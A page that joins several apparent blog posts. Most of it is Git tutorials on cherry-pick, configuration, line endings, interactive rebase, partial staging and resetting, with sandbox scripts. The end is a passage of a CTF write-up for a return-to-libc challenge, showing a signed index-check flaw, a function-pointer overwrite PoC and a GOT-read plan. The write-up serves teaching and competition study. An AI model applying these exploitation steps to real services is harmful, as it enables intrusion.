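# Updating the laptop's checked-out master is refused by default...
if git push -q origin vm:master 2>/dev/null; then master_push=accepted; else master_push=refused; fi
# ...while pushing the separate vm branch works.
git push -q origin vm

# Back on the laptop, integrate the branch (a fast-forward here).
cd "$tmp/laptop"
git rebase vm >/dev/null 2>&1
laptop_master=$(git rev-parse master)
vm_head=$(git -C "$tmp/vm" rev-parse HEAD)
```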

Going After Cherries

In some cases, when working with multiple branches, it might happen that you need a specific commit from one branch but you don’t want to merge that branch into your current one.

Fortunately, Git allows you to pick a single commit as easily as picking cherries from a cherry tree. In fact, the command is git cherry-pick.

$ git cherry-pick 1904c3d4c9720
[master 3a30153] File to be cherry-picked in master.
 Author: Andrei Petre <p31andrei@gmail.com>
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 file_to_get_in_master

Now you have a new commit on your branch, with the same change as the cherry-picked commit:

$ git log
commit 3a3015378c3c1b43c4895a00829034d53fb9a5b5
Author: Andrei Petre <p31andrei@gmail.com>
Date:   Fri Mar 8 23:59:07 2013 +0200

    File to be cherry-picked in master.

As you can see, the commit hash is different, meaning that this is a new commit, not the old one.

Should a commit not apply cleanly, Git stops the cherry-picking process and asks for human intervention. After the problems are resolved, you can continue with git cherry-pick --continue. Or, if you change your mind after seeing the trouble, you can abort with git cherry-pick --abort.
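Here is a small sketch in a throwaway repository. A hypothetical side branch has two commits, and master takes only the first one. Master gets a commit of its own first, so the cherry-picked copy has a different parent and therefore a different hash:

```shell
set -eu
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT
export GIT_AUTHOR_NAME=Demo GIT_AUTHOR_EMAIL=demo@example.com
export GIT_COMMITTER_NAME=Demo GIT_COMMITTER_EMAIL=demo@example.com
git init -q "$tmp/repo"
cd "$tmp/repo"
git symbolic-ref HEAD refs/heads/master
echo base > README
git add README
git commit -qm 'Initial commit'

# A hypothetical side branch with two commits; master wants only the first.
git checkout -q -b side
touch file_to_get_in_master
git add file_to_get_in_master
git commit -qm 'File to be cherry-picked in master.'
picked=$(git rev-parse HEAD)
echo wip > not_wanted
git add not_wanted
git commit -qm 'Unrelated work'

# Master moves on, then takes just that one commit.
git checkout -q master
echo more >> README
git commit -qam 'Keep working on master'
git cherry-pick "$picked" >/dev/null
copy=$(git rev-parse HEAD)
subject=$(git log -1 --format=%s)
```

Adding -x (git cherry-pick -x) appends a "(cherry picked from commit <hash>)" line to the commit message, which helps when the original commit is public.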

Git Is The Answer 1/3

Published on 18 March 2013 by Răzvan Deaconescu and Mihai Maruseac

We focus on Git again. This time, we present some real-world scenarios where knowledge of advanced Git topics helps. To keep the article at a reasonable length, our presentation is divided into three parts, and this is the first one.

User Setup

After installing Git and before making any commits into a repository, you must set up your user information and preferences. It is common to do this in the global configuration, using git config:

git config --global user.name "Razvan Deaconescu"
git config --global user.email "razvan.deaconescu@cs.pub.ro"
git config --global color.ui auto

You should do this setup for each account you use; at the very least, on your laptop or workstation.

Global configuration is stored in ~/.gitconfig.

In case you want to use different user information within a repository, use the git config command in that repository, but without the --global option:

cd /path/to/repository.git
git config user.email "razvan@rosedu.org"

In the above setup, I have only updated the email address for the repository. The other options used are picked from the global configuration.

Per-repository configuration is stored in /path/to/repository.git/.git/config.
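You can check the precedence between the two levels in a sandbox. This sketch assumes HOME points at a scratch directory, so your real ~/.gitconfig is left alone:

```shell
set -eu
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT
# Sandbox: ~/.gitconfig becomes "$tmp/.gitconfig" for this script only.
export HOME="$tmp" GIT_CONFIG_NOSYSTEM=1
unset XDG_CONFIG_HOME GIT_CONFIG_GLOBAL

git config --global user.name "Razvan Deaconescu"
git config --global user.email "razvan.deaconescu@cs.pub.ro"

git init -q "$tmp/repository.git"
cd "$tmp/repository.git"
git config user.email "razvan@rosedu.org"   # this repository only

name=$(git config user.name)     # inherited from ~/.gitconfig
email=$(git config user.email)   # repository value overrides the global one
stored=$(git config --file .git/config user.email)
```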

Handling Line Endings Like a Pro

From time to time you will have to work with people who use a different operating system. This is no problem if both of you use systems with the same line endings (CRLF for Windows, LF for Linux/OSX). In all other cases, Git’s default line-ending settings might not work for you.

You can configure Git globally to handle line endings by setting the core.autocrlf option in your ~/.gitconfig. However, the best setting differs from platform to platform.

For Windows you would use

git config --global core.autocrlf true

While for Linux/OSX you would use

git config --global core.autocrlf input

Remember that these settings apply only to you, on the systems where you configured them. To have the settings travel with the repository, you have to take a different path: create a .gitattributes file with content similar to:

* text=auto
*.c text
*.h text
*.sln text eol=crlf
*.png binary
*.jpg binary

The first line tells Git to handle the line endings of all text files automatically. The next two lines declare that .c and .h files are to be treated as text, so their line endings are converted to the proper format. The .sln line uses a new parameter (eol=crlf). It tells Git to normalize the files on commit but to always check them out with CRLF endings. Use this for files that need CRLF endings, even on Linux. A similar setting (eol=lf) exists for LF endings.

Finally, there are cases when you need to commit binary files into the repository. In these cases, changing LF characters to CRLF or the other way around will break the binary. You have to tell Git not to touch them, so you mark them as binary in the .gitattributes file.

If the repository already contained committed files, then after you create the .gitattributes file, each of you will see files show up as modified even though they haven’t changed. This happens because the line-ending settings changed but the repository was not renormalized. To solve this, follow these steps on a clean working tree (otherwise, uncommitted changes will be lost).

First, remove everything from the index and reset both the index and the working directory (the risky part):

git rm --cached -r .
git reset --hard

Finally, stage all the normalized files and create a normalizing commit:

git add .
git commit -m "Normalized line endings"

From now on, Git will properly do the job of handling line endings for you.
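This sketch checks two of the rules above in a throwaway repository. A .c file written with CRLF is stored with LF, and a .sln file written with LF comes back with CRLF after a checkout. The file contents are hypothetical. core.autocrlf is switched off locally so that only .gitattributes is in play:

```shell
set -eu
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT
export GIT_AUTHOR_NAME=Demo GIT_AUTHOR_EMAIL=demo@example.com
export GIT_COMMITTER_NAME=Demo GIT_COMMITTER_EMAIL=demo@example.com
git init -q "$tmp/repo"
cd "$tmp/repo"
git config core.autocrlf false   # let .gitattributes alone decide
git config core.safecrlf false   # no conversion warnings in this demo

cat > .gitattributes <<'EOF'
* text=auto
*.c text
*.h text
*.sln text eol=crlf
*.png binary
EOF

cr=$(printf '\r')
printf 'int main(void)\r\n{\r\n    return 0;\r\n}\r\n' > main.c   # CRLF
printf 'Project\nEndProject\n' > app.sln                            # LF
git add .gitattributes main.c app.sln
git commit -qm 'Add sources'

# The blob stored in the repository has LF endings only.
if git cat-file -p HEAD:main.c | grep -q "$cr"; then blob_cr=yes; else blob_cr=no; fi

# A fresh checkout of the .sln file gets CRLF endings (eol=crlf).
rm app.sln
git checkout -- app.sln
if grep -q "$cr" app.sln; then sln_cr=yes; else sln_cr=no; fi
```

On Git 2.16 or later, git add --renormalize . re-applies the attributes to files that are already tracked. It is a gentler alternative to the git rm --cached -r . and git reset --hard sequence above.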

How to Create and Setup a Local Repo

One of the best features of Git is the ability to rapidly create and use local repositories. You don’t have to create a repository and then check it out locally, as you do in Subversion. You just create or enter a directory and initialize it as a Git repository. Changes to the files in that directory can then be recorded as commits.

Assuming I am working on a personal project, the first thing I would do is create a directory and initialize it as a Git repository. I recommend you append the .git extension:

mkdir ~/projects/troscot.git
git init ~/projects/troscot.git
cd ~/projects/troscot.git

The first thing you add in a repository is a .gitignore file stating the files you wish to ignore. Such a sample file is here.

You just create the .gitignore file in the repository root and then add it to the repository:

vi .gitignore
git add .gitignore
git commit -m 'Initial commit. Add global .gitignore file'

After this, one would create, add and commit any files required.

Another use case is putting existing directories under version control. This may happen when you already have some pieces of code in place and want to put them in a repository. My personal use case is versioning configuration directories. For example, to version the Apache2 configuration files, one would issue (as root):

cd /etc/apache2/
git init .
vi .gitignore
git add .gitignore
git commit -m 'Initial commit. Add global .gitignore file'
git add .
git status
git commit -m 'Initial commit. Add all config files to repository'

The above commands add a .gitignore file to the repository and then add all Apache2 configuration files. Running git status after git add is always a good idea, to make sure you are committing the right stuff. You may need to update your .gitignore file if you’ve missed ignoring certain types of files.
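Here is a runnable sketch of the same steps. It assumes a scratch directory stands in for /etc/apache2, so no root is needed. It also assumes that editor leftovers (*~, *.swp) are what the .gitignore should exclude:

```shell
set -eu
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT
export GIT_AUTHOR_NAME=Demo GIT_AUTHOR_EMAIL=demo@example.com
export GIT_COMMITTER_NAME=Demo GIT_COMMITTER_EMAIL=demo@example.com

# Scratch stand-in for /etc/apache2, with some editor leftovers.
mkdir -p "$tmp/apache2/sites-available"
cd "$tmp/apache2"
echo 'Listen 80' > ports.conf
echo '<VirtualHost *:80>' > sites-available/default
touch ports.conf~ .ports.conf.swp

git init -q .
printf '*~\n*.swp\n' > .gitignore
git add .gitignore
git commit -qm 'Initial commit. Add global .gitignore file'
git add .
staged=$(git status --porcelain | tr '\n' ';')   # review before committing
git commit -qm 'Initial commit. Add all config files to repository'
tracked=$(git ls-files | tr '\n' ' ')
```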

I Want To Tweak A Commit

From time to time you realize that you have done something wrong in a commit. Either you forgot to add a good, descriptive message or you have really screwed up some parts of the committed code. Maybe you have some compile errors to fix, or your commit does too many things at once.

In all of these cases, Git allows you to rewrite the commit at will. You can add changes or tweak metadata (author name, commit message, etc.) just by issuing the needed commands and ending with

git commit --amend

However, this works only for the tip of the current branch. To change a commit that is not HEAD, you’ll need to rebase. The rebase temporarily moves HEAD to the commit you want to change, allowing you to use the procedure above. It is best to start the rebase interactively, so that you have full control over what it does. Pass it the commit just before the first one you want to change:

git rebase -i cf80a4ad6d64bff2

The above will open your editor (configurable via git config) with content similar to the following. If you really want to, you can also find it on disk, in .git/rebase-merge/git-rebase-todo:

pick 899e7e6 Add Silviu's contributions.
pick 02f1ef9 Add contribs to Cristian Mocanu.
pick 98194cd Add contributions of Andru Gheorghiu.
pick 2931f1d Add 2 contributions of spopescu.

# Rebase cf80a4a..2931f1d onto cf80a4a
#
# Commands:
#  p, pick = use commit
#  r, reword = use commit, but edit the commit message
#  e, edit = use commit, but stop for amending
#  s, squash = use commit, but meld into previous commit
#  f, fixup = like "squash", but discard this commit's log message
#  x, exec = run command (the rest of the line) using shell
#
# These lines can be re-ordered; they are executed from top to bottom.
#
# If you remove a line here THAT COMMIT WILL BE LOST.
#
# However, if you remove everything, the rebase will be aborted.
#
# Note that empty commits are commented out

As you can see, you can select an action to apply to each commit. If you only want to edit the commit message, replace pick with reword (or r). If you want to edit the content of the commit, select edit. You can even reorder commits, squash them into a bigger one, etc.

For now, we will focus on editing the contents of one commit, so we change pick to edit on the last line:

e 2931f1d Add 2 contributions of spopescu.

The rebase process then carries out the actions we’ve listed. In our case, it will stop at commit 2931f1d to allow editing it:

Stopped at 2931f1d... Add 2 contributions of spopescu.
You can amend the commit now, with

    git commit --amend

Once you are satisfied with your changes, run

    git rebase --continue

Now you can add or remove content and change the commit as you want. Then stage your changes with git add, record them with git commit --amend and resume the rebase with git rebase --continue. Both of the last two commands are needed.
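To try the edit workflow without an editor, the same steps can be scripted in a scratch repository. This is a minimal sketch that rests on a few assumptions. The repository, file names and commit messages are made up. GIT_SEQUENCE_EDITOR (a Git environment variable that replaces the editor for the todo list only) is pointed at a sed command that turns the first pick into edit. GNU sed is assumed, since BSD sed spells in-place editing as sed -i ''.

```shell
#!/bin/bash
set -e

# Throwaway repository with three commits (all names are illustrative).
repo=$(mktemp -d)
cd "$repo"
git init -q
git config user.name "Demo"
git config user.email "demo@example.com"
for n in 1 2 3; do
    echo "contribution $n" > "file$n.txt"
    git add "file$n.txt"
    git commit -q -m "Add contribution $n"
done

# Rebase the last two commits. sed plays the role of the editor and turns
# the first "pick" (the older commit, "Add contribution 2") into "edit".
# Assumes GNU sed; with BSD sed use: sed -i '' -e ...
GIT_SEQUENCE_EDITOR="sed -i -e '1s/^pick/edit/'" git rebase -i HEAD~2

# The rebase is now stopped at "Add contribution 2": change it and amend.
echo "contribution 2 (fixed)" > file2.txt
git add file2.txt
git commit -q --amend -m "Add contribution 2 (fixed)"

# Replay the remaining commit on top of the amended one.
git rebase --continue
git log --format='%h %s'
```

After it runs, the log still has three commits. The middle one is replaced by its amended version, and it and the commit on top of it get new hashes.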

If you decide that the commit is OK and that the rebase was not needed, you can always abort it with git rebase --abort.

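Finally, keep in mind that it is not recommended to change commits once they have been pushed to another repository. Rewriting a commit changes its hash, so anyone who already has the old commit ends up with a diverging history.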

But My Commit Is Too Big

From time to time, you will have some big changes to commit. However, it is rare for all of them to form a single atomic change that cannot be split into several smaller ones. Take, for example, a LaTeX Beamer file: you can commit each section separately, or even each slide, as you see fit. But how can you split the commit?

Actually, there are two commands for this. One is git add -i, which allows interactive adding of parts of your changes. The other one is git add -p, which is simpler.

Running git add -p will present you with the first hunk of changes to be staged. This hunk may or may not be atomic, so after presenting it Git asks:

Stage this hunk [y,n,q,a,d,/,e,?]?

Selecting ? will print the help text and then the hunk again. The help text is:

y - stage this hunk
n - do not stage this hunk
q - quit; do not stage this hunk nor any of the remaining ones
a - stage this hunk and all later hunks in the file
d - do not stage this hunk nor any of the later hunks in the file
g - select a hunk to go to
/ - search for a hunk matching the given regex
j - leave this hunk undecided, see next undecided hunk
J - leave this hunk undecided, see next hunk
k - leave this hunk undecided, see previous undecided hunk
K - leave this hunk undecided, see previous hunk
s - split the current hunk into smaller hunks
e - manually edit the current hunk
? - print help

Now you can use these options to split your commit or edit it. Editing is the most advanced feature of git add -p and the only one that needs more explanation, so let’s choose it.

Stage this hunk [y,n,q,a,d,/,e,?]? e

Again, we will be presented with an editor to edit the contents of .git/addp-hunk-edit.diff. The comment at the end of the file is self-explanatory:

# To remove '-' lines, make them ' ' lines (context).
# To remove '+' lines, delete them.
# Lines starting with # will be removed.
#
# If the patch applies cleanly, the edited hunk will immediately be
# marked for staging. If it does not apply cleanly, you will be given
# an opportunity to edit again. If all lines of the hunk are removed,
# then the edit is aborted and the hunk is left unchanged.

The - lines are lines that the commit will remove and the + lines are lines it will add. Thus, if you delete a + line, the commit will not contain that addition. If you turn a - line into a context line (replace the leading - with a space), the commit won’t remove it.

Since git add -p is such a powerful feature, it is worth adding an alias for it via git config. For example, I have git gap do the same thing as git add -p. It is now in my muscle memory to type git gap when adding changes for a new commit.

I Don’t Want This Commit Anymore

Often you want to roll back a change you’ve made. As long as everything is happening locally (i.e. you haven’t pushed to a remote repository), Git offers the proper tools to handle this.

Assume you’ve updated a file but want to discard those changes. You’ve just done some tests, decided the changes are not needed and want to get back to the initial version. Then you would issue

git checkout -- file-name

The above command restores the file to the version in the staging area, which is the last committed version if you haven’t staged anything. It’s very useful when you make a mess of a local file.

A common situation arises when preparing a commit. You use one or more git add commands to prepare it; sometimes you use git add ., which gives you little control over what gets added. You then find out that you’ve added too much content to the staging area. In order to remove the extra content from the staging area (and leave it in the working directory), issue:

git reset HEAD file-name

If you want to start building your commit from the beginning and discard all information in the staging area, you would use:

git reset HEAD

When the file name is left out, all content is removed from the staging area; the working directory is left untouched.

Suppose you’ve just found out that you’ve made some bad commits. The last two commits are really bad and need to be redone. As long as you haven’t pushed anything, you can rework those commits: reset the repository HEAD and leave the commit changes in the working directory. If we want to redo the last two commits, we would just issue:

git reset HEAD^^

Remember, this doesn’t remove the commit changes. The repository HEAD is simply moved back and the commit changes are left in the working directory; you will then use them to create proper new commits.
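The effect can be checked in a scratch repository. This sketch, with made-up file names and commit messages, creates one good commit and two bad ones and then moves HEAD back two commits. It uses HEAD~2, an equivalent spelling of HEAD^^ that avoids ^ being treated specially by some shells.

```shell
#!/bin/bash
set -e

# Scratch repository with one good commit followed by two bad ones.
repo=$(mktemp -d)
cd "$repo"
git init -q
git config user.name "Demo"
git config user.email "demo@example.com"
echo "good" > notes.txt
git add notes.txt
git commit -q -m "Good commit"
echo "bad 1" >> notes.txt
git commit -q -am "Bad commit 1"
echo "bad 2" >> notes.txt
git commit -q -am "Bad commit 2"

# Same as git reset HEAD^^: HEAD moves back two commits and, in the default
# (--mixed) mode, the staging area is reset too, but the files are left alone.
git reset -q HEAD~2

git log --format='%h %s'   # only "Good commit" is left
git status --short         # notes.txt is reported as modified
```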

I Want To Change This File Silently

GitHub has an excellent article on ignoring files. A particular situation is ignoring updates to files that are already in the repository (i.e. they’ve been previously committed and can’t be ignored using .gitignore).

I ran into this situation in my repository of recommendation letters. I’m using a Makefile to compile a letter and have isolated some variables in it:

$ cat Makefile
PERSON = Alexandru_Juncu
FOLDER = alexandru-juncu

include base.mk

When I create a new recommendation, I update the Makefile to compile it. However, this change needn’t make it into the repository. Otherwise, every time I recompiled an old letter of recommendation, I would change the Makefile. I would then have to push the new changes or, if I didn’t want to push them, revert them with git checkout.

The best solution is for Git to ignore any updates to the Makefile. The initial Makefile is stored in the repository (as a model), but subsequent changes should not be visible. This can be done by using:

git update-index --assume-unchanged Makefile

From now on, Git no longer reports changes to the Makefile in the working directory (e.g. in git status).

If you want to undo this, use:

git update-index --no-assume-unchanged Makefile
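Here is a scratch-repository sketch of the Makefile trick, with a made-up second letter (Jane_Doe is hypothetical). It also uses git ls-files -v, which prints files marked assume-unchanged with a lowercase tag, to list which files currently carry the flag.

```shell
#!/bin/bash
set -e

# Scratch repository with a committed "model" Makefile, as in the example above.
repo=$(mktemp -d)
cd "$repo"
git init -q
git config user.name "Demo"
git config user.email "demo@example.com"
printf 'PERSON = Alexandru_Juncu\nFOLDER = alexandru-juncu\n\ninclude base.mk\n' > Makefile
git add Makefile
git commit -q -m "Add model Makefile"

git update-index --assume-unchanged Makefile

# Point the Makefile at another (hypothetical) letter; git status stays clean.
printf 'PERSON = Jane_Doe\nFOLDER = jane-doe\n\ninclude base.mk\n' > Makefile
git status --short

# Files marked assume-unchanged get a lowercase tag ("h") in git ls-files -v.
git ls-files -v | grep '^[a-z]'
```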

GiTS 2013 CTF -- return-to-libc -- pwnable 250

Published on 19 February 2013 by Lucian Cojocar

Introduction

This is a write-up for the Pwnable 250 level of the Ghost in the Shellcode capture the flag competition. It describes a return-to-libc attack, together with the steps for solving the level using the original binary from the competition.

Hello binary!

Let’s start by inspecting the binary.

  • 32bit dynamically linked binary

    $ file ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f
    ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f: ELF 32-bit LSB executable, ...
  • it waits for connections on port 31337

    $ strace -f ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f
    	[...]
    setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
    bind(3, {sa_family=AF_INET, sin_port=htons(31337), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
    listen(3, 20)                           = 0
    accept(3, 

SO_REUSEADDR is used, just for easy debugging ;-). It lets the server bind() the port again while old connections are still in TIME_WAIT, so there is no more annoying Address already in use error after the server crashes.

	$ telnet localhost 31337
	Trying ::1...
	Trying 127.0.0.1...
	Connected to localhost.
	Escape character is '^]'.
	Connection closed by foreign host.
	$

It immediately drops the connection.

Let’s have a look at what happens when we are connecting to it.

	$ ltrace -f ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f
	[...]
	[pid 4359] accept(3, 0, 0, 0x697a0002, 1)                                           = 4
	[pid 4359] fork()                                                                   = 4361
	[pid 4359] close(4)                                                                 = 0
	[pid 4359] accept(3, 0, 0, 0x697a0002, 1 <unfinished ...>
	[pid 4361] <... fork resumed> )                                                     = 0
	[pid 4361] getpwnam("back2skool")                                                   = NULL
	[pid 4361] err(-1, 0x804997b, 0x80499b8, 0, 0back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f:
	Failed to find user back2skool: Success
	 <unfinished ...>
	[pid 4361] +++ exited (status 255) +++

In short, getpwnam fails and the forked child exits. The printed error is explicit: the user back2skool is required.

Usually, the first step when trying to solve a remote challenge is to debug it locally. Of course, this is possible only as long as we can run the application ourselves.

After setting up the user, we can see the following output when connecting:

	$ telnet localhost 31337
	Trying ::1...
	Trying 127.0.0.1...
	Connected to localhost.
	Escape character is '^]'.
	    __  ___      __  __   _____
	   /  |/  /___ _/ /_/ /_ / ___/___  ______   __ v0.01
	  / /|_/ / __ `/ __/ __ \\__ \/ _ \/ ___/ | / /
	 / /  / / /_/ / /_/ / / /__/ /  __/ /   | |/ /
	/_/  /_/\__,_/\__/_/ /_/____/\___/_/    |___/
	===============================================
	Welcome to MathServ! The one-stop shop for all your arithmetic needs.
	This program was written by a team of fresh CS graduates using only the most
	agile of spiraling waterfall development methods, so rest assured there are
	no bugs here!
	
	Your current workspace is comprised of a 10-element table initialized as:
	{ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 }
	
	Commands:
		read	Read value from given index in table
		write	Write value to given index in table
		func1	Change operation to addition
		func2	Change operation to multiplication
		math	Perform math operation on table
		exit	Quit and disconnect
	exit
	Exiting program!
	Connection closed by foreign host.
	$

The vulnerability

High-level

The output of the program is self-explanatory. Let’s try some commands.

$ telnet localhost 31337
read
Input position to read from:
3

Nothing special.

Input position to read from:
10
Value at position 10: 134519224

We can read past our table!

Input position to read from:
-200
Value at position -200: 0

We can read below our table!

read
Input position to read from:
90000
Connection closed by foreign host.

The program received SIGSEGV and the socket was closed. At least we can crash the program; in fact we are only crashing the child that has been spawned to handle our connection.

But what about write?

$ telnet localhost 31337
write
Input position to write to:
0
Input numeric value to write:
1
Value at position 0: 1

Nothing special.

write
Input position to write to:
10
Table index too large!

Bummer, we cannot write past our table!

write
Input position to write to:
-1
Input numeric value to write:
42
Value at position -1: 42
write
Input position to write to:
-10000 
Input numeric value to write:
999
Connection closed by foreign host.

Heh, we can write below our table!

Low-level

The assembly code responsible for checking the indices was shown in two IDA screenshots.

(Screenshot: Read - atoi)

As you can not see, there is no index check at all for the read operation.

(Screenshot: Write - atoi)

For the write operation, the index is checked with a jle instruction. But jle is meant for comparing signed integers; jbe, which compares unsigned integers, should have been used here. You can find more in this wiki article. The original code probably looks something like this:

int i;
i = atoi(str);
if (i > 9) {	/* signed comparison: any negative i passes */
	error();
	exit(1);
}
do_stuff(i);

One way to fix the above code is to use an unsigned comparison; another is to also reject negative values. Both would work in this case, but then we couldn’t solve this level :-).
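The difference between the two comparisons can be modelled with bash arithmetic, which is 64-bit. Masking with 0xffffffff reinterprets a 32-bit two’s complement pattern as an unsigned number, which is how jbe sees its operands. This is a sketch of the two checks, not code recovered from the binary; the function names are hypothetical.

```shell
#!/bin/bash
# Sketch of the two index checks (not code recovered from the binary).

# What the binary does: jle, a signed comparison against 9.
signed_check() {
    [ "$1" -le 9 ]
}

# What it should do: jbe, an unsigned comparison. Masking with 0xffffffff
# reinterprets the 32-bit two's complement pattern as an unsigned number.
unsigned_check() {
    [ $(( $1 & 0xffffffff )) -le 9 ]
}

for i in 3 10 -1 -2147483634; do
    if signed_check "$i"; then s=accepted; else s=rejected; fi
    if unsigned_check "$i"; then u=accepted; else u=rejected; fi
    printf '%12d  jle: %-9s jbe: %s\n' "$i" "$s" "$u"
done
```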

In short, the index checking is broken: we can use any index for the read operation, and any negative index for the write operation. When you can write anything to any address of a program, the rest is just implementation.

The exploit

As explained in the previous section, we can modify almost any address in our vulnerable program. In order to choose the right way to exploit the vulnerability, we should gather more information about the environment.

Do we have any RWX place to store the payload?

$ readelf -e ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f 
ELF Header:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 
[...]

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  PHDR           0x000034 0x08048034 0x08048034 0x00120 0x00120 R E 0x4
  INTERP         0x000154 0x08048154 0x08048154 0x00013 0x00013 R   0x1
      [Requesting program interpreter: /lib/ld-linux.so.2]
  LOAD           0x000000 0x08048000 0x08048000 0x022a8 0x022a8 R E 0x1000
  LOAD           0x002e68 0x0804be68 0x0804be68 0x00204 0x00214 RW  0x1000
  DYNAMIC        0x002e7c 0x0804be7c 0x0804be7c 0x000d8 0x000d8 RW  0x4
  NOTE           0x000168 0x08048168 0x08048168 0x00044 0x00044 R   0x4
  GNU_EH_FRAME   0x001e94 0x08049e94 0x08049e94 0x000c4 0x000c4 R   0x4
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4
  GNU_RELRO      0x002e68 0x0804be68 0x0804be68 0x00198 0x00198 R   0x1
[...]

The short answer is no: there is no RWX segment in the binary, so we cannot write to memory that will later be executed. Maybe we could put our payload in some region and then make that region executable, which means calling mprotect or mmap. But we would have to do this without injecting code, only by changing non-executable data, e.g. stack values. One idea is to use a return-oriented programming (ROP) approach. However, as you will see in a later section, our program doesn’t use mprotect or mmap from libc. Calling them would therefore require figuring out their offsets in libc first, and once we can do that, it is more straightforward to call the system function directly.

Is ASLR enabled?

It is safe to assume that ASLR is enabled. But because we will use some sort of ROP, we don’t care too much about this right now.

Where shall we write?

In order to change the control flow of the program by only modifying non-executable memory, we have to find an indirect jump and overwrite the address it jumps through. The GOT is the natural starting point for this.

The first idea that comes to mind is to overwrite the GOT entry of a function that is called later. The GOT is always at the same place in memory (it resides in the binary), but recall that we’re writing relative to a buffer (the workspace table). So the next question is:

Do we know the address of the buffer?

There are three places where the buffer might be located:

  • on the stack. If ASLR is enabled, its address can be figured out by reading a saved %ebp, which is possible because we can read memory relative to the buffer address;
  • on the heap. This is harder. But if our buffer is on the heap and we can alter the structures used internally by malloc (and we can, thanks to the negative-offset write), there is a way to exploit it. We could do something similar to a double-free exploit, but it would be a tedious job;
  • declared global (.bss or .data section). The address of the buffer is the same as in the binary, with no runtime surprises.

Probably because pwn250 is not the hardest level, the buffer is in the .data section.

(Screenshot: Values buffer)

Because our buffer is in the .data section and we can use negative indices for read and write, we have good control over the memory below our buffer. Moreover, you can see in the IDA screenshot above that there’s a math variable. The program can switch from one operation (addition) to another (multiplication), and it does so by changing a pointer to a function. The pointer is in the .bss section.

(Screenshot: Indirect jump via math_ptr)

At this point, one might argue that the authors of the program added this pointer to make the problem easier to solve. That’s true and I wouldn’t argue against it; it’s just a game.

So let’s state our idea: we will overwrite a function pointer that is used later. The function it points to is called whenever we issue the math command.

First PoC

$ telnet localhost 31337
[...]
math
You haven't set a mode yet!
func1
Setting mode to ADDITION
write
Input position to write to:
-2147483634
Input numeric value to write:
286331153
Value at position -2147483634: 286331153
math
Connection closed by foreign host.
$

Meanwhile, back at the castle.

$ strace -f ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f
[...]
[pid  4710] recv(4, "\n", 1, 0)         = 1
[pid  4710] send(4, "Value at position -2147483634: 2"..., 41, 0) = 41
[pid  4710] read(4, "m", 1)             = 1
[pid  4710] read(4, "a", 1)             = 1
[pid  4710] read(4, "t", 1)             = 1
[pid  4710] read(4, "h", 1)             = 1
[pid  4710] read(4, "\r", 1)            = 1
[pid  4710] read(4, "\n", 1)            = 1
[pid  4710] --- SIGSEGV (Segmentation fault) @ 0 (0) ---
Process 4710 detached
$

OK, we’ve got our segmentation fault. Let’s see where the instruction pointer was.

$ gdb ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f /home/back2skool/core 
[...]
Core was generated by `./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f'.
Program terminated with signal 11, Segmentation fault.
#0  0x11111111 in ?? ()
(gdb) 

Neat! But what are those numbers? We wrote the value 286331153 at position -2147483634. The value is the address we want the math command to jump to. The position is computed as follows:

  • the base of our buffer (values) is at the fixed address 0x804c040
  • the address we want to write to (the math function pointer) is 0x804c078
  • so we need to write at values+0x38
  • the positive index 0x38/4 = 14 fails the upper-bound check
  • the negative index -(2^31 - (0x38/4)) == -2147483634 passes it
  • you can test this by computing 2^33 + 0x804c040 - 4*(2^31 - (0x38/4)), which gives 0x804c078. Because the buffer holds 4-byte values and is accessed with scaled addressing, the overflow is ignored and the address wraps around. The wrap-around is needed only when we try to access a value above the base address of the array.
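The index arithmetic above can be double-checked with bash arithmetic (64-bit), masking the result to 32 bits the way the CPU’s address computation does. The addresses are the ones quoted in this write-up for this particular binary.

```shell
#!/bin/bash
# Recompute the write index used in the first PoC.
base=$(( 0x804c040 ))      # &values[0]
target=$(( 0x804c078 ))    # the math function pointer
slot=$(( (target - base) / 4 ))          # 14: rejected by the "index > 9" check
index=$(( -((1 << 31) - slot) ))         # -2147483634: negative, so accepted

# The CPU computes base + 4*index in 32 bits, so the high bits fall off.
effective=$(( (base + 4 * index) & 0xffffffff ))
printf 'slot=%d index=%d effective=0x%x\n' "$slot" "$index" "$effective"

# The value written into the pointer: 0x11111111 in decimal.
echo $(( 0x11111111 ))
```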

The instruction pointer is exactly the value we wrote (0x11111111 is 286331153 in decimal). So we’ve managed to change the program’s control flow with a single write, and in a predictable way.

Second PoC

We are now in the following state: we can make our program jump to any location. But where should it jump? Because we have no way of injecting code, we must rely on code that is already available: the program’s own code and the code of the dynamic libraries mapped into its address space.

Let’s inspect our binary again to see what it uses from shared libraries.

$ nm -D -u ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f 
         w __gmon_start__
         U __libc_start_main
         U __stack_chk_fail
         U accept
         U atoi
         U bind
         U chdir
         U close
         U err
         U exit
         U fork
         U free
         U getpwnam
         U htonl
         U htons
         U listen
         U perror
         U read
         U recv
         U send
         U setgid
         U setgroups
         U setsockopt
         U setuid
         U signal
         U socket
         U vasprintf
$ 

Hmm, nothing useful: nothing to execute, nothing to modify the mappings. But hey, the loader maps the whole libc into our address space, not only the functions we use, so the other libc functions are there too. The problem is that we don’t know where they are. A wild idea appears: if we knew the address of one libc function, we could compute the addresses of the others by adding some offsets. There are two problems with this idea: how do we find the address of a used function, and how do we compute the offset of an unused function?

  • finding the address of a used function is simple: we can read its GOT entry, which has already been filled in by the dynamic loader. Because of lazy binding, we only have to be careful to choose a function that has already been called. We will choose recv for this purpose.

